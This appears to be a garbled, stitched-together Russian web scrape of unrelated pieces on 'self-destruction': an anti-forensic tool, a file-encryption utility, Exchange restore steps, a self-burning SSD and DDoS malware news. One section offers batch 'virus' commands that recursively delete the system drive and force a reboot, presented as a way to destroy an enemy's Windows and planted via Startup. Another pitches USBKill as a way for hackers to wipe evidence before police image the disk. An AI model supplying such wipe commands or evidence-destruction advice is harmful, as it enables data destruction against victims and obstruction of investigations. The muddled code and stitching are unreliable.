Вредоносная программа для DDoS-атак содержит функции самоуничтожения. Самоуничтожение виндовс


Самоуничтожающаяся операционная система | Liberatum.ru

Полицейский спецназ высаживает дверь, бьет гражданина сапогом в лицо и отнимает компьютер. Таков примерный сценарий задержания опасных киберпреступников. Что в этом алгоритме самое неприятное для задержанного? Разумеется, изъятие компьютера, ведь результаты экспертизы станут основанием для помещения хакера в места лишения свободы на долгие-долгие годы.

Задержание хакера

Чтобы исключить последний пункт, специалисты по компьютерной безопасности предложили любопытную технологию USBKill. Суть проста: рабочая операционная система помещается внутрь виртуального контейнера и зашифровывается. Все операции хакер производит через эту гостевую ОС. Другая программа, работающая на основной системе, следит за активностью USB-портов и другими характеристиками:

  • Если компьютер выключается, для доступа к данным потребуется пароль.
  • Если к ноутбуку подключается или отключается зарядное устройство, USBKill удалит виртуальную ОС.
  • Если к компьютеру будут подключены внешние устройства через USB-разъем — USBKill уничтожит виртуальную рабочую ОС со всеми уликами.

Последний пункт особенно важен, ведь любая экспертиза начинается с загрузки специального разведывательного ПО, с помощью которого снимается образ всего диска. Как только флешка с таким ПО будет подключена, USBKill уничтожит данные и копировать будет уже нечего.

Авторы USBKill раскрывают и другие интересные гаджеты, используемые спецслужбами при проведении киберопераций. В частности, названы такие устройства, как Mouse jiggler и Keyboard jiggler.

Mouse Jiggler

Эти USB-устройства распознаются ОС как обычные мышь и клавиатура. Используются джиглеры для того, чтобы симулировать активность на компьютере и предотвратить срабатывание экрана блокировки из-за простоя. USBKill расценит попытку подключения такого устройства как прямой сигнал к уничтожению данных.

Загрузить исходный код USBKill можно на сайте GitHub.

От USBKill больше вреда или пользы? С одной стороны, подобные программы позволяют защитить конституционное право каждого человека на личную тайну (ст. 23, п. 1). С другой стороны, эти программы помогают избежать ответственности за совершенные преступления. Так разрешать их или запрещать?

Это интересно!

liberatum.ru

Как уничтожить WindowsКомпьютер76

Как уничтожить Windows противника?

ВНИМАНИЕ.

Автор статьи снимает с себя всякую ответственность за неправомерное применение или распространение ниженаписанного. Информация предоставлена лишь для ознакомления. Используйте его на свой страх и риск. Попробуйте все способы, лучше — на виртуальной машине.

 Очередной трюк с Блокнотом и скриптом для Windows. Хотя на этот раз трюком назвать это нельзя – это самый настоящий вирус по своему действию. Подобные зловреды в сети редко гуляют. Он приведёт систему противника к краху. Настойчиво рекомендую вам пробовать этот скрипт на виртуальной машине. Ещё лучше — не полениться и установить на вновь созданном разделе жёсткого диска свежую операционную систему. Дабы уничтожить Windows описанными способами.

Как уничтожить Windows . Вариант 1.

Суть кода. Он уничтожит системные файлы Windows и вызовет появление BSOD. Итак, пишем Вирус Смерти. Вот синтаксис скрипта:

@echo off del %systemdrive%\*.*/f /s /q shutdown –r –f –t 00

Сохраните этот файл под расширением .vbs в любом месте. Перед сохранением не закрывайте и переходите к следующему шагу. Замените в названии Текстовый документ на Все файлы (All files). Вирус запускается двойным щелчком или как обычно из папки Автозагрузки. После загрузки системы пользователь увидит синий экран смерти.

Также можно попробовать (вместо второй строчки) такую команду:

del /f /s /q "C:\*.*"

Некоторые файлы откажутся удаляться, так как они могут использоваться в данный момент системой. Удалим, что сможем. Строка примет вид:

rd C:\ /s /q

Как обычно для такой папки, скрипт работать не будет при запуске из Безопасного режима.

После определённых раздумий и изысканий статью решил продолжить. Вот ещё несколько скриптов, которые разнесут систему вашего недруга в пух и прах.

Как уничтожить Windows . Вариант 2.

Напишем bat файл. Как и во всех подобных случаях откроем Блокнот и введём такой код:

{ @Echo off Del C:\ *.* |y }

Сохраняем в нужном месте под любым именем, но с обязательным расширением .bat.  Для «работы» батника потребуется время. Результатом будет стирание данных на диске С. Для восстановления затёртых данных придётся прибегать к услугам специализированного программного обеспечения или обращаться к обученным бойцам. В любом случае это потраченные время и нервы. Порой немалые деньги.

Пока всё. Используйте правильно.

Откройте для себя ещё больше трюков на сайте Компьютер76

Успехов.

Просмотров: 2 224

Похожее

computer76.ru

Quick Crypt: шифрование с «самоуничтожением» файлов

000

Новая программа Quick Crypt, на первый взгляд, не отличается от десятка других утилит для шифрования файлов под Windows. Однако, у неё есть уникальная особенность: при шифровании задаётся количество дней, в течение которых файл может быть расшифрован. После указанной даты дешифровка становится невозможной.

quick-crypt

Шифрование происходит с помощью симметричного блочного шифра AES (256 бит) после введения парольной фразы. Рекомендуется использовать фразу длиной более 20 символов, с прописными и строчными буквами, цифрами и служебными знаками.

В метаданных зашифрованного файла можно указать системный идентификатор, уникальный для конкретного ПК. В этом случае дешифровка будет возможна только на данном компьютере. Никто другой не сможет восстановить информацию, даже зная пароль.

expire-encrypted-file

Для работы Quick Crypt требуется среда .NET Framework 4.5, так что программа не запускается под Windows XP, а только под Windows Vista, 7, 8 и 8.1 (32 или 64 бит).

Программа занимает всего 125 КБ, её можно поместить в zip-архив вместе с зашифрованными файлами.

Quick Crypt работает отлично. Правда, смущает отсутствие исходного кода и анонимность разработчика. Непонятно, кто стоит за компанией Valkova Technology. Фирма начала свою деятельность в апреле 2014 года, выпустив первую версию Quick Crypt, ранее о ней ничего не было известно.

xakep.ru

Самоуничтожение данных на диске

Ответ:

При восстановлении данных можно восстанавливать только данные Exchange. Данные можно восстанавливать как в исходное местоположение, так и в другое место. При восстановлении данных в исходное расположение система архивации данных Windows Server и подключаемый модуль автоматически выполняют процесс восстановления, в том числе отключают существующую базу данных и воспроизводят журналы в восстановленной базе данных.

When restoring data, it's possible to restore only Exchange data. This data can be restored to its original location or to an alternate location. If you restore the data to its original location, Windows Server Backup and the plug-in automatically handle the recovery process, including dismounting any existing databases and replaying logs into the recovered database.

Использование системы архивации данных Windows Server для резервного копирования в Exchange

Запустите систему архивации данных Windows Server.

Выберите пункт Локальная архивация.

На панели действий выберите элемент Однократная архивация..., чтобы запустить мастер однократной архивации.

На странице Параметры архивации выберите пункт Другие параметры и нажмите кнопку Далее.

На странице Конфигурация архивации выберите пункт Настраиваемая и нажмите кнопку Далее.

На странице Объекты для архивации нажмите кнопку Добавить элементы, чтобы выбрать тома, которые нужно заархивировать, и нажмите кнопку ОК. ПримечаниеПримечание Выберите тома, а не отдельные папки. Единственный способ выполнить архивирование или восстановление на уровне приложений — выбрать весь том.

Выберите пункт Дополнительные параметры. На вкладке Исключения нажмите кнопку Добавить исключение, чтобы добавить файлы или их типы, которые необходимо исключить при архивировании. ПримечаниеПримечание По умолчанию в резервную копию включаются тома с компонентами операционной системы и приложениями; исключить их нельзя.

На вкладке Параметры VSS выберите элемент Полная архивация VSS, нажмите кнопку ОК, а затем — Далее.

На странице Тип места назначения выберите расположение, в котором необходимо сохранить резервную копию, и нажмите кнопку Далее.

Если выбран пункт Локальные диски, откроется страница Место назначения архивации. Выберите параметр из раскрывающегося списка Место назначения архива и нажмите кнопку Далее.

Если выбран пункт Удаленная общая папка, откроется страница Выбор удаленной папки. Укажите UNC-путь для файлов резервной копии и настройте параметры управления доступом. Выберите пункт Не наследовать, если хотите, чтобы резервная копия была доступна только при использовании определенной учетной записи. Укажите имя пользователя и пароль к учетной записи с правами на запись на компьютере, на котором размещена удаленная папка, и нажмите кнопку ОК. Или же выберите пункт Наследовать, если хотите, чтобы к резервной копии имели доступ все, у кого есть доступ к удаленной папке. Нажмите кнопку Далее.

На странице Подтверждение проверьте параметры архивации и нажмите кнопку Архивация.

На странице Ход архивации можно наблюдать за состоянием и ходом операции создания резервной копии.

Нажмите кнопку Закрыть, чтобы в любой момент закрыть страницу Ход архивации. Резервное копирование продолжится в фоновом режиме.

Использование системы архивации данных Windows Server для восстановления резервной копии Exchange

Запустите систему архивации данных Windows Server.

Выберите пункт Локальная архивация.

На панели действий выберите команду Восстановить, чтобы запустить мастер восстановления.

На странице Приступая к работе выполните одно из указанных ниже действий:

Если восстанавливаемая резервная копия данных создана на локальном сервере, выберите пункт Этот сервер (имя_сервера) и нажмите кнопку Далее.

Если восстанавливаемые данные хранятся на другом сервере или восстанавливаемая резервная копия находится на другом компьютере, выберите пункт Другой сервер, а затем нажмите кнопку Далее. На странице Укажите тип размещения выберите пункт Локальные диски или Удаленная общая папка и нажмите кнопку Далее. Если выбран пункт Локальные диски, на странице Выберите расположение резервной копии укажите диск с резервной копией и нажмите кнопку Далее. Если выбран пункт Удаленная общая папка, на странице Укажите удаленную папку введите UNC-путь к резервной копии и нажмите кнопку Далее.

На странице Выбор даты архивации выберите дату и время резервной копии, которую требуется восстановить, и нажмите кнопку Далее.

На странице Тип восстановления выберите пункт Приложения, а затем нажмите кнопку Далее. ПримечаниеПримечание Если пункт Приложения отсутствует в этом разделе, значит, для последующего восстановления была выбрана резервная копия на уровне папки, а не тома. Резервное копирование данных Exchange с помощью системы архивации данных Windows Server требует создания резервных копий на уровне тома.

Убедитесь, что на странице Выбор приложения в поле Приложения выбран сервер Exchange. Чтобы просмотреть компоненты приложения резервной копии, нажмите кнопку Просмотреть сведения. Если восстанавливается самая последняя резервная копия, будет отображен флажок Не выполнять восстановление базы данных приложений с повтором всех завершенных транзакций. Чтобы система архивации данных Windows Server не выполняла восстановление базы данных с повтором всех завершенных транзакций согласно списку незавершенных действий в журнале транзакций, установите этот флажок. Нажмите кнопку Далее.

На странице Параметры восстановления выберите расположение для восстановления данных и нажмите кнопку Далее.

Выберите команду Восстановить в исходное расположение, если данные Exchange необходимо разместить в первоначальном расположении. Используя этот параметр, вы не сможете указать, какие базы данных необходимо восстановить. Поэтому все архивированные базы данных на этом томе будут восстановлены в исходных папках.

Чтобы восстановить отдельные базы данных и файлы в указанное местоположение, выберите пункт Восстановить в другое расположение. Чтобы указать другое местоположение, нажмите кнопку Обзор. Этот параметр позволит выбрать базы данных, которые необходимо восстановить. Восстановленные файлы данных можно переместить в базу данных восстановления, а затем вручную вернуть в исходное расположение или поместить в другой раздел организации Exchange с помощью Переносимость баз данных. При восстановлении в другое расположение восстановленная база данных будет находиться в состоянии неправильного отключения. По завершении восстановления необходимо вручную перевести ее в состояние правильного отключения с помощью Eseutil.exe.

На странице Подтверждение проверьте параметры восстановления и нажмите кнопку Восстановить.

На странице Ход восстановления можно наблюдать за состоянием и ходом операции восстановления.

После завершения операции восстановления нажмите кнопку Закрыть.

И это работает если, база находится на системном разделе

forundex.ru

SSD-диск с кнопкой самоуничтожения – отличный вариант для спецагентов

Сергей Липченко, опубликовано 18 мая 2012 г.

Если приходиться носить с собой много секретной информации на ноутбуке, то, естественно, следует заботиться о ее сохранности. Конечно, обычно для защиты используют какой-нибудь хитромудрый пароль или еще какой-то особый шифр, но что, если просто в момент того, кто-то хочет получить доступ к вашим файлам, сжечь вообще весь жесткий диск?

Жесткий диск с кнопкой самоуничтожения – отличный вариант для спецагентов

Звучит, возможно, немного глуповато. Но компания RunCore создала InVincible SSD – накопитель с двумя кнопками, которые позволят одним нажатием удалить все данные. Первая кнопка, зеленая, после нажатия позволяет SSD-диску стереть абсолютно все данные, делая его девственно чистым. И тогда злодеи уже просто ничего не получат. А вот вторая, красная кнопка, завершает начатое, так сказать. Нажав ее, через диск проходит удар высокого напряжения и просто сжигает его изнутри, плавя все внутренние чипы, оставляя после себя лишь клубок дыма.

Если так призадуматься, то кому такой накопитель нужен? Наверное, двум типам людей – шпионам, вроде Джеймса Бонда, которые хранят на нем секреты государства, или же преступникам, которые хранят там какие-нибудь зловещие схемы по террактам, и, когда ФСБ вломиться к ним, террористы успеют все уничтожить.

В любом случае, если у человека нет на диске каких-либо сверхсекретных файлов, то InVincible SSD вряд ли ему будет нужен. Если он, конечно, не конченый параноик. Но пока никаких данных по цене и дате выхода такого накопителя нет.

www.gizmonews.ru

Вредоносная программа для DDoS-атак содержит функции самоуничтожения

Атаки, которые сокрушили десятки правительственных сайтов в Южной Корее запоследнюю неделю, заключали в себе еще один неприятный сюрприз: вредоноснаяпрограмма побуждает инфицированные компьютеры выполнить спонтанноесамоуничтожение.

DDoS-атаки былиобнаружены в пятницу, они были направлены на сайты, принадлежащие президентуЮжной Кореи, Национальной разведывательной службе и Министерству иностранныхдел. Они бы не оставили никакого существенного следа если бы не пара интересныхдеталей, выявленных исследователем в области безопасности из McAfee ГеоргомВичерски. Наиболее поражает то, что инфицированные зомби, использованные ватаках, запрограммированы на уничтожение важных системных файлов, что можетвывести из строя компьютеры.

"Одно лишь ясно", — написал Вичерски в блоге. "Это серьезная вредоноснаяпрограмма. Она использует устойчивые техники для избежания уничтожения и дажеимеет разрушительные возможности в своем пейлоуде".

"Устойчивые техники" относятся к многоступенчатой командно-контрольнойструктуре, которая распространяет вредоносные инструкции на двух уровнях, чтобысделать их более устойчивыми к реверс-инженерингу системы. Первая часть содержитзашифрованный список серверов для второй группы управляющих компьютеров, которыеи рассылают команды к атаке.

Более того, первый ряд серверов физически расположен в десятках стран,обеспечивая резервирование на случай если некоторые из них уничтожат.

Когда инфицированные боты достигают второго уровня, они получают списоксайтов для атаки. Но они также получают команды к самоуничтожению, котороепроисходит вследствие затирания главной загрузочной записи на основном жесткомдиске.

"Если ты хочешь уничтожить всю информацию на компьютере и впоследствиисделать ее непригодной, это то, что надо", — сказал Вичерски.

Вредоносная программа также дает указания компьютерам осуществить затираниемногих других файлов, хранящихся на жестком диске, включая документы MicrosoftOffice и файлы, используемые языками программирования, такими как C, C++ и Java.

Ботмастеры обладают определенной гибкостью в ситуации, когда механизмсаморазрушения запущен, но количество дней, в которых наступит разрушение,ограничено 10. Переустановка даты на компьютере-зомби на время перед тем, как онбыл инфицирован, немедленно активирует перезапись.

xakep.ru